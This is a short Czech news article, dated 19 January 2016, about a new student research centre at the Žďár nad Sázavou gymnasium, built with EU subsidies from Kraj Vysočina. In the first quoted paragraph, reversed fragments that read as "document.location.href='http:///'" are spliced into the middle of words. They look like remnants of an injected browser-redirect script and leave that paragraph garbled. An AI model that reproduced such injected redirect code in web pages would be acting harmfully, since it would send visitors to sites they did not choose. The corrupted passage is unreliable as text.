Rainbow page separator

Ve žďárském gymnáziu mají studenti nové badatelské centrum

Úterý, 19. ledna 2016

Badatellské centum ve Žďáře nad Sázavou

Žďár nad Sázavou / Nové badatelské centrum bylo uvedeno do provozu ve žďárském gymnáziu. Jedná se o jedno z pěti center, které Kraj Vysočina díky evropské dotaci zřídil. Pracoviště jsou vybavena nejmodernější technikou, studenti tam pracují pod vedením pedagogů ve svém volném čase i v rámci výuky.
„Pro účely badatelny jsme za 4,2 milionu korun přestavěli dosud nevyuži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou půdu gymnázia. Velkorysý pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tor dvou velkých propojených badatelen a učebny se zázemím a moderními přístroji za 3,4 milionu korun mohou do budoucna využít nejen žáci gymnázia, ale také místních základních škol. I pro jejich projekty bude pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tor k dispozici,“ uvedla radní Kraje Vysočina pro oblast školství Jana Fialová.
Studenti mohou využívat k bádání pracoviště chemické analýzy vzorků, pracoviště vysokorychlostního snímkování, termokamery a laserovou optiku nebo robotické pracoviště. „Výuka fyziky, biologie a chemie bude teď atraktivnější a předpokládáme, že díky novým možnostem si přírodní vědy získají na vysočinských gymnáziích více příznivců,“ dodala Fialová. Kraj Vysočina na projekt badatelských center mohl využít třiatřicet milionů korun z evropských dotací.